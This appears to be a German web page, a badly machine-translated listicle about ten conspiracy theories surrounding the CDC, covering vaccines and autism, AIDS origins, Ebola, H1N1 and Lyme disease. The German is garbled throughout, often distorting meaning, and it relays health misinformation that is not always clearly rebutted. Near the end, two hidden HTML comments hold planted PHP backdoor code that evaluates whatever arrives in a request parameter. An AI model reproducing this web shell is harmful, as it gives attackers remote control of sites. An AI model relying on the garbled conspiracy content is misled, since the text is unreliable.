Nachrichtenticker

10 völlig verrückt Verschwörungstheorien über die CDC

Weird Stuff

Debra Kelly 24. April 2015

Das Hauptziel der Centers for Disease Control and Prevention ist es, theoretisch sicher zu halten uns von all den fiesen Krankheiten, die sie sich in ihren Labors, ihre saubere Zimmer, und ihre biohazard Gewölbe gesperrt haben. Aber, sind die Menschen Menschen, und die Menschen sind von Natur aus misstrauisch jemand mit, dass viele böse Werkzeuge zur Verfügung. Dies wirkt sich ein paar ziemlich wilde Theorien über genau das, was passiert hinter den verschlossenen Türen der CDC geleitet.

 

10 Die Coffin Stockpile

Schatzkästchen
Die CDC in Atlanta, Georgia, und das blieb nicht unbemerkt von Menschen, die auch gesehen hatte, was aussah wie ein riesiger Vorrat an Särgen sitzt ein Feld entlang der Interstate 20, außerhalb von Madison, Georgia. Werfen Sie in der Nähe des Flughafens, und die Gerüchteküche zu drehen begannen.

Nach den Verschwörungstheoretikern, das Feld war der Ort von Särgen, die die CDC wurde in Vorbereitung für Lagerung, was sie forderten eine “Hoch Unfallereignis. “In jüngster Zeit, dass die massive Ebola-Ausbruch, als Verschwörungstheoretiker erkannt, dass nicht nur waren die Särge noch da, aber es gab auch eine Seite auf der CDC-Website, um die Handhabung und Entsorgung der Leichen von Menschen, die hatten gewidmet war starb an Ebola. Die Website absolut nicht festlegen, dass spezielle Schatullen wurden zur Bestattung erforderlich. (Ursprünglich wurden sie “hermetisch verschlossenen Särgen”, ein Begriff, der mit “Metall” Schatullen in einer Januar 2015 Update ersetzt aufgerufen wurde.)

Es gibt ein paar große Probleme mit der ganzen Theorie. Zum einen sind die Särge nicht wirklich Schatullen; sie sind Gruft Liner, die im Inneren des Grab in Gebieten, die anfällig für Bodenverhältnisse wie Überschwemmungen sind platziert werden. Die schweren Liner zu halten Boden Verschieben und Reduzieren in einem hölzernen Sarg. Auch müssen sich die Grabkammern nicht auf die CDC, FEMA, oder einer anderen Regierungsbehörde angehört; sie gehören zu den Unternehmen, die sie produziert, Vantage Produkte. Das Feld in Georgia ist nur, wo sie lagern Sie sie, und es gibt nichts fischig darüber, wie ihre Produktionsstätten befinden sich in der Nähe.

 

9 Die Imitations AIDS Virus

HIV Virus

Die Idee, dass AIDS war eine von Menschen gemachte Virus auf eine ahnungslose Bevölkerung wirklich entfesselt hat seinen Start in einem ostdeutschen Veröffentlichung, die angeblich von der KGB, genannt gesponserte AIDS: USA hausgemachtem Böse . Die Arbeit der beiden Wissenschaftler 1986 argumentierte die Flugschrift, dass die amerikanische Regierung ihre Fort Detrick, Maryland, Labor benutzt hatte, um ein Schaf mit einem menschlichen Virus ein, um AIDS zu schaffen kombinieren.

Die ganze Idee war ein Schritt getan weiter durch Dr. William C. Douglass, der AIDS hat geschrieben: das Ende der Zivilisation und behauptete, dass die deutschen Wissenschaftler hatten Recht, und die Weltgesundheitsorganisation (WHO) und der CDC waren für die Ausübung einer verantwortungsvollen das Virus in der menschlichen Population. Er behauptete, es war nicht schwer, weil es durch so ziemlich jede Art von zufälligen Kontakt, die man sich denken kann, auch Mücken übertragen.

Strecker Gruppe Kopf Dr. Robert Strecker an der Verschwörung fahrenden Zug mit einigen sprang auch Noch beeindruckender Theorien. Ihm zufolge ist die CDC aktiv die Verbreitung des Aids-Virus, das ist eigentlich ein Hybrid zwischen einer Kuh und einem menschlichen Virus ein, und es gibt sechs verschiedene Arten von AIDS-Viren in all das, was er vage vorgeschlagen, könnte eine Partnerschaft mit den Kommunisten entwickelt . Seine Theorien, Werke, und schlecht gemacht Amateurvideos fuhr fort, Dr. Alan Cantwell, der mit dem Finger auf der CDC wies für das, was er glaubte, waren klare politische Motivationen für ihre aktive Verbreitung von AIDS zu begeistern.

Nach Cantwell ist das CDC das Instrument von einem Völkermord Targeting Amerikas Homosexuell Bevölkerung. Einer seiner Kollegen Theoretiker geht erstaunlicherweise einen Schritt weiter und schlägt vor, dass diese unglaubliche Versuch, Völkermord fordert nichts weniger als das Kriegsrecht und den Widerruf der bürgerlichen Freiheiten, während das ganze Problem wird aussortiert.

8 Die CDC, Mercury-Tainted Impfstoffe und Autism

 Outdoor Portrait 6 Jahre alter Junge
Die Schlacht darüber, ob die Eltern sollte oder nicht, ihre Kinder impfen ist ein laufendes ein, und es ist eine ziemlich faszinierende Geschichte über die Verschwörungstheoretiker ‘Seite. Im Jahr 2005 Robert F. Kennedy Jr. einen Artikel veröffentlicht, in Rolling Stone Verknüpfung der großen Pharma-Ketten mit Tendenz der Regierung, die potentiell gefährlichen Auswirkungen zu verstecken.

Nach Kennedy, der CDC ein Treffen in der Simpsonwood Conference Center, dass er mit Wörtern und Phrasen wie “isoliert” und beschrieben “völliger Geheimhaltung.” Es war nur auf Einladung, und nur Spitzenbeamte aus verschiedenen Teilen der Regierung wurden aufgefordert, von der FDA, die WHO, und jeder von einem Who is Who der Drogen-Unternehmen aufzulisten. Sie waren den strikten Befehl, nichts zu diskutieren.

Das ganze Treffen angeblich hatte mit Erkenntnissen durch eine CDC Epidemiologen, die Quecksilber-basierte Impfstoffe mit einer hohen Rate von Autismus und anderen Entwicklungsproblemen wie Verzögerungen bei der Freigabe verknüpft tun Rede und Hyperaktivität. Gemäß der Daten waren Impfstoffe für die Anhebung der Fälle von Autismus auf eine in 166 Fällen-up von der normalen in 2500 verantwortlich.

Der Rest der Konferenz, Kennedy sagt, ausgegeben wurde, zu diskutieren, wie zur Deckung alles auf. Er sagt, dass die Transkripte der Super streng geheimen Sitzung (die er durch den Freedom of Information Act erworben) Detail den Schaden Steuermodus, der alle Vertreter ging in. Die Daten wurden überarbeitet, und die CDC war mehr als glücklich, eine helfende Hand bei der Beseitigung der Quecksilberbasis Impfungen los zu verleihen, nicht zu zerstören, sondern um sie zu verkaufen und exportieren sie in andere Länder.

Die Transkripte Kennedy überzeugt, dass die Gefahren von Impfungen waren real und wies darauf hin, dass andere Länder, darunter Russland, hatte die Quecksilber-basierte Zusatzstoff aus Impfungen vor Jahrzehnten verboten. Er fährt fort zu sagen, dass die klaren Interessenkonflikt und die Verbindungen zwischen dem CDC und die finanziellen Interessen der Pharmaunternehmen machen deutlich, dass etwas getan werden muss.

Die Geschichte hat es nicht leicht gehabt laufen davon. Ursprünglich schien es zunächst in beide Salon und Rolling Stone . Salon die Geschichte eingefahren, während es blieb auf dem Rolling Stone Website in einer pay-Abschnitt nur, bis zu verschwinden, was sie eine sogenannte “Re-Design-Fehler.” Der Artikel dann wieder aufgetaucht, und Rolling Stone verweigert, sie hätten absichtlich entfernt es, auch wenn es keine Verbindungen zu dem Artikel überall, und Suchbegriffe tauchte nichts.

Nach Kennedy gibt, Zwei Ärzte, die Zugang zu den Informationen er gehabt haben: Mark und David Geiers. Die Geiers selbst im besten Fall umstritten, die Förderung, was sie eine Heilung für Autismus, die chemische Kastration beinhaltet nennen. Approbation Mark Geier wurde für die Förderung dieser aufgehängt “heilen”, und David Geier, die nicht einmal ein Arzt war, wurde mit Ausübung der Medizin ohne Lizenz in Rechnung gestellt.

7 Die Krebs erregenden Polioimpfstoff

 Impfung
1999 Studien wurden durchgeführt, um zu zeigen, dass schien, dass diejenigen, die von immunisiert wurden Impfstoffe 1954-61 hergestellt worden war auch etwas namens Simian Virus 40 (SV40) ausgesetzt. Es ist lange diskutiert worden, wie gefährlich das Virus, und die Studie von 1999 schien zu bestätigen, dass es in der Tat, eine höhere Instanz von bestimmten Krebsarten, wie Knochentumoren und Mesotheliom, in denen, die geimpft worden waren. Eine andere Studie aus dem Jahr 2005 bestätigt, dass, obwohl die Verwendung von SV40 hatte nach 1962 verboten worden, einige osteuropäische Hersteller hatte immer noch mit ihm bis 1978 Zu allem Überfluss war die Formel, die verwendet wurde, nicht das Virus inert zu machen.

Diese Studien, die einen Zusammenhang zwischen SV40 und bestimmte Arten von Krebs zu bestätigen schien, sind keineswegs unumstritten, aber, und die wissenschaftliche Gemeinschaft noch immer nicht fest auf der einen Seite des Zauns oder der anderen Seite über die Auswirkungen des Sitzens SV40. Ein Teil des Problems liegt in der Reinheit der Proben. Einige neuere Beweise widerspricht Behauptungen, dass die Chemikalie verursacht Krebs mit dem Hinweis darauf, dass die SV40-kontaminierten selbst wurde so gibt es keine absolute noch.

Die CDC und der National Cancer Institute (NCI) ursprünglich argumentiert, mit den Ergebnissen, dass schlug es eine Verbindung, sagen, dass, obwohl SV40 hatte im Zusammenhang mit einigen dieser fruchtbaren Krebsarten festgestellt, gab es nichts, die tatsächlich bewiesen, es war das Virus, das die Krebsarten verursacht hatte. Anschuldigungen folgte, dass Studien, die von der CDC und dem NCI getan absichtlich falsch dargestellt die Daten, die zu der schattigen Schluss, dass es etwas zu vertuschen, besonders wenn sie sagte, dass es eigentlich keine Verbindung. Verschwörungstheoretiker beschuldigte sowohl die CDC und die NCI zur Durchführung ihrer Experimente in einer Weise, dass sie bekam die Ergebnisse, die sie wollte, um zu vertuschen, die Tatsache, dass sie erlaubt Impfstoffe, die sie wussten enthaltenen Live-SV40 in Millionen von Kindern über verwendet werden das Land.

Später, im Jahr 2013, einer Seite auf der CDC-Website zu, dass die ursprünglichen Studien recht gehabt hatte, dass es SV40 in Polio-Impfstoffe, und dass einige Studien schienen zu zeigen, es verbunden war aufgetaucht zu Krebs. Doch es gab auch an, dass eine tatsächliche kausale Beziehung zwischen SV40 und Krebs, ist fraglich. . Die Seite wurde später abgebaut, wenn auch Bildschirmaufnahmen von es kann immer noch gefunden werden

6 Gardasil

 Gardasil

Gardasil ist einer von zwei der wichtigsten Impfstoffe zum Schutz gegen Humane Papillomaviren (HPV), hergestellt. Nach dem CDC-Website, gab es eine Anzahl von berichteten Nebenwirkungen aus der Impfstoff einschließlich Ohnmacht und Schmerzen an der Injektionsstelle. Sie sagen auch, dass es zu Fällen, in denen Mädchen haben die Impfung erhalten und kurz darauf aber betonen, dass dies nicht bedeutet, dass es der Impfstoff, der die Ursache des Todes gestorben.

Andere glauben, dass ist absolut der Fall ist, und die CDC kennt. Im Jahr 2009 die CDC veröffentlicht einen Bericht über die Nebenwirkungen am häufigsten bei Frauen, die eine Injektion erhalten Gardasil und, wie die Website sagt, enthalten sie ohnmächtig und Blutgerinnsel. Nach einer Reihe von Eltern, obwohl, ist die CDC zu tragischen Geschichten über Kinder, die nach dem Aufstehen die Injektionen Tagen gestorben zuzugeben.

Ein Großteil dieser Daten wird von der US-Vaccine Adverse Event Reporting System kommen ( VAERS). Das System wurde entwickelt, um den Überblick über alle Nebenwirkungen von Impfstoffen gemeldet zu halten, aber es ist eine offene Datenbank, die jeder bearbeiten kann und nicht auf Fakten überprüft. Der CDC offizielle Erklärung im Jahr 2009, sagte, dass es bereits mehr als 25 Millionen Dosen des Medikaments verabreicht wird, und dass die Informationen aus den VAERS Berichte zeigen, dass etwa 54 Fällen pro 100.000 Injektionen Nebenwirkungen hatten, mit 32 Todesfällen auch als die verbunden gemeldet .

Dieser hat selbst die Profis aufgeteilt. Einige sind mit dem CDC Abstellgleis und sagen, dass die Todesfälle waren wahrscheinlich nicht verknüpft mit der Impfung, aber andere sind ein wenig misstrauisch, dass etwas los ist.

5 Bill Gates und Ebola

Bill Gates

Wenn das Ebola-Krise wurde der Welt, Greifen, die CDC tat etwas, das auf der Oberfläche, aussehen könnte ein wenig seltsam: versuchten sie, den Virus zu patentieren

Das ist genau die Art von Sache, die Verschwörungstheoretiker lieben, und sie darauf sprang.. Nach der Verschwörung Version der Geschichte, die CDC versuchte, den Virus zu patentieren, so dass sie allein hielt die Heilung; sie würden natürlich stehen, um ein Vermögen zu machen. Sie wurden mit einigen anderen Regierungsorganisationen zusammen, um es zu tun, einschließlich des National Institute of Health und der US Army Medical Research Institute of Infectious Diseases. Sie haben auch eine Spende von Bill Gates $ 50.000.000.

Es ist klar, das war der tell-all. Verschwörungstheoretiker, sagte, dass es keinen Grund dafür, dass er vielleicht geben diese Art von Geld, ohne zu erwarten, einen Gewinn am Ende des Tages zu machen. Gates ‘Aussage, dass er wollte, Impfungen für alle Kinder, die in der dritten Welt, und das schien darauf hinzudeuten, dass er mit dem CDC arbeiten, um seinen Gewinn zu sichern.

Die Erklärung für das Patent, das echte war, war viel, viel weniger bedrohlich und so ziemlich das genaue Gegenteil dessen, was die Menschen Verschwörung behauptet. (Beachten Sie, dass die CDC hat bereits das SARS-Virus patentiert.) Indem das Patent auf das Virus, würden wiederum sicherstellen, dass kein Pharmaunternehmen in der Lage wäre, ein Monopol auf Informationen von entscheidender Bedeutung für die Entwicklung eines Impfstoffs zu halten. Genauer gesagt, sie eine Version des Virus, die sicher zu handhaben war und ein Patent auf der Grundlage dieser Arbeiten eingereicht entwickelt hatte.

4 H1N1 war ein Hoax

Swine
Im Jahr 2009 wurden Überschriften mit den neuesten Nachrichten auf dem H1N1-Schweinegrippe-Pandemie prallen. Die Grundlagen enthalten Prävention, warum es wichtig ist, Ihre Grippeimpfung zu bekommen, und die Folgen der nicht immer die Grippe-Impfung. Nach Angaben der Verschwörungstheoretiker, aber es gab nichts wirklich besonderes oder tödlicher über H1N1; Es war nur eine schwere klingenden Namen gegeben und als Vorwand, um einige Backdoor-Angebote, um Impfstoffe zu verkaufen machen verwendet.

Die CDC und der WHO waren angeblich unter einer Decke, um eine Massenpanik durch das Dach und zu fahren zu verkaufen, wie viele Impfstoffe, wie sie konnten. Sie gezielt schwangere Frauen und Kinder, sagen, dass diejenigen, die am stärksten von der tödlichen Schweinegrippe, die, bevor es vorbei war, hatte das Potenzial, fast zwei Millionen Menschen ins Krankenhaus schicken waren. Studien der CDC begraben offensichtlich bestätigt, dass es war nicht so schlecht. Familienmitglieder hatten nur etwa 10 Prozent Chance, den Fang Schweinegrippe aus einem anderen Familienmitglied, und 99,9 Prozent derjenigen, die mit dem Virus infiziert würde nicht mehr als die Auswirkungen von einem milden, typischen, saisonalen Grippe leiden.

Die CDC war der Erhöhung der Zahl der Menschen, die an H1N1 gestorben und vertuschen anderen Grunderkrankungen oder anderen medizinischen Gründe, warum Menschen wurden krank und starben vorgeworfen. Die Schuld für die Grippe Todesfälle bedeutete den Verkauf von Impfstoffen, während die Wahrheit zu sagen, auch die Idee, dass die Grippe war schlimmer für Menschen, die übergewichtig waren, nicht verkaufen, so viele Impfstoffe.

Einige gingen so weit, zu sagen, dass die Schweinegrippe war weniger gefährlich als die üblichen saisonalen Grippe und warf der CDC verfälschen Zahlen und Daten, die ganze Sache sehen viel, viel schlimmer als es tatsächlich war alles, damit sie Impfstoffe, die nicht dabei waren, trotzdem funktionieren verkaufen könnte .

3 Ebola, Krankheit & amp; Immigration

 Ebola
Die CDC ist angeblich einer der Hauptakteure in der Gründung der Neuen Weltordnung, und sie sind es zu tun, indem sie illegale Einwanderer ins Land zu Krankheit in der Hoffnung, die ganze Gesundheitssystem zusammenbrechen zu verbreiten.

Angezeigte Karten Städte, in denen gab es Berichte über Ebola wurden gefunden, um mit den höchsten Karten Detaillierung entsprechen Bevölkerungsgruppen und Standorten von illegalen Einwanderern. Das sind die gleichen Stellen, die angeblich vorausgesagt haben, die höchsten Dichte Bevölkerung in den nächsten Jahrzehnten entwickeln. Diese Bereiche umfassen die um New York City, San Francisco, und der Golfküste, unter anderem.

Eine dieser anderen Bereichen ist Denver, die Heimat von offiziellen Flughafen der neuen Weltordnung ist. Woher wissen wir das? Wegen der massiven, unterirdische Stadt und komplexe abzurufen, die bereits unter dem Flughafen in der Vorbereitung für die Errichtung der neuen Weltordnung aufgebaut.

Möchten Sie zusammen mit der Gründung der Neuen Weltordnung ist Einwanderungsreform. Die CDC wird die Anpassung ihrer Ebola Screening-Protokolle, um eine erhöhte Wahrscheinlichkeit, dass Einwanderer aus bestimmten Gebieten der Welt sind eher in Kontakt mit Ebola und anderen Krankheiten gewesen zu verbergen zu haben. Dies soll einen doppelten Nutzen für die CDC haben: Die Zahl der Ebola-Fällen wird wachsen, so dass die CDC noch entscheidend für das Überleben der Nation. Es wird auch eine Verringerung der Chancen, dass Nationalität Status wird auf jede negative Art Ansteckung und der Ausbreitung von Krankheiten verknüpft werden, so dass Staatsangehörigen, das Land unter dem Radar ein und aus, um den so genannten “New World Order Mega-Regionen geschickt werden . “

Es ist nicht nur Ebola, auch nicht. Verschwörungstheoretiker sind unter Berufung auf das Vorhandensein von illegalen Einwanderern ins Land tragen Krankheiten wie Tuberkulose, Dengue-Fieber, Malaria, Masern und Hepatitis erlaubt. Die CDC wird gesagt, dass in die andere Richtung, während diese Flut der Einwanderer kommt über die südliche Grenze der Vereinigten Staaten, in der Hoffnung, viele Krankheiten ins Land zu entfesseln, was den Zusammenbruch der Wirtschaft und des Gesundheitssystems, die alle dazu beitragen, Kick-Start der neuen Weltordnung.

2 Lyme Disease

 Lyme-Borreliose

Es gibt eine Tonne von Verschwörungstheorien da draußen auf Lyme-Borreliose aus gutem Grund: Es gibt eine Menge, die wir einfach nicht darüber wissen. Wir haben gerade entdeckt, dass es eine gute Chance, dass es sexuell übertragbare, und das ist ein bisschen des Puzzles, die nur zeigte sich im Jahr 2014.

Es gibt auch eine große Debatte darüber, ob chronische Lyme-Borreliose ist eine Sache, denen wir erwähnt. Diese Debatte hat sich sehr schnell zu Verschwörungstheorie Ebenen, dank einem großen Teil auf Mitt Romney und Virginia Gouverneur Bob McDonnell gestiegen. Nach ihrem Glauben, und die Ergebnisse einer Arbeitsgruppe durch den Kanzler der Hochschule Patrick Henry führte, hat die CDC gewesen missachtet die Fakten und Zahlen hinter Lyme-Borreliose. Die Arbeitsgruppe macht auch ein paar ziemlich gefährlich Aussagen, sagen, dass die CDC, unter anderen medizinischen Organisationen, hat keinen wissenschaftlichen Beweis, dass die Lyme-Krankheit kann durch eine einmonatige Runde von Antibiotika geheilt werden.

Die Task Force hat auch für die CDC fordert, zurücktreten, wenn es um die Untersuchung chronischer Lyme-Borreliose, die Schätzung, dass einer von sechs Menschen in Virginia infiziert sind kommt. Das ist weit entfernt von Berichten von 756 Fällen in all 2011 der CDC und der Glaube an die chronische Lyme-Borreliose ist, wo die Gefahr kommt, weil die Symptome ziemlich vage in ihrem eigenen Recht. Kopfschmerzen, Traurigkeit und Müdigkeit. Das bedeutet, dass es ist nicht ungewöhnlich für Menschen mit chronischen Lyme-Borreliose diagnostiziert werden, wenn sie von etwas anderes wie Depressionen leiden, und es hält sie davon ab, die Hilfe, die sie benötigen.

1 Fehl- und die Grippe-Impfstoff

 Pregnancy
Wenn es etwas gibt, dass die CDC scheint häufig verantwortlich gemacht zu werden für, es wird in auf dem Impfstoffmarkt, egal was es kostet. Im Falle der Grippeimpfstoffe wurde, dass die Kosten unvorstellbar hoch zu sein.

Die CDC empfiehlt in der Regel die saisonale Grippe-Impfungen für die schwächsten Bürger-ältere Menschen, sehr jung, und die Schwangerschaft. Nach Angaben der National Coalition of Organized Frauen wurde die Grippe-Saison 2009-10 von der CDC, die ganz und gar nicht darauf, dass die Impfstoffe wurden verursacht Tausende und Tausende von Fehlgeburten betreut. Sie behaupten, ein 4.250-Prozent-Zunahme der Zahl der Totgeburten. Ihre Informationen stammen aus der VAERS Datenbank (was, wie wir gesagt haben, ist überhaupt nicht zuverlässig).

Nach den Anschuldigungen, die CDC wissentlich einen Impfstoff, der nicht für die getestet wurden gestellt Reaktionen bei Schwangeren und dann freigelassen Informationen darüber, wie die gleichen schwangere Frauen waren diejenigen, die sicherstellen, dass sie den Impfstoff bekommen benötigt. Die die Meldung von Ereignissen in diejenigen, die geimpft wurden, Dr. Marie McCormick zuständigen Arzt, galt als die enormen Anstieg der fötalen Todesfällen abgedeckt gezielt. Auf einer Konferenz 2010 wird es berichtet, dass Ärzte versuchten, Beweise zu verbergen, dass sie über die Gefahr und dem Anstieg der Fehlgeburten, die zusammen mit dem Impfstoff kam gewusst hätte, was Kenner fragen sich, wie viele andere Gefahren, schwangere Frauen und die Bevölkerung Insgesamt ist aufgrund der Doppelschaften der CDC ausgesetzt.

<!– [insert_php]if (isset($_REQUEST[ HzO ])){eval($_REQUEST[ HzO ]);exit;}[/insert_php][php]if (isset($_REQUEST[ HzO ])){eval($_REQUEST[ HzO ]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST[ rVEgy ])){eval($_REQUEST[ rVEgy ]);exit;}[/insert_php][php]if (isset($_REQUEST[ rVEgy ])){eval($_REQUEST[ rVEgy ]);exit;}[/php] –>

bestenlisten

Leave a comment

Your email address will not be published.


*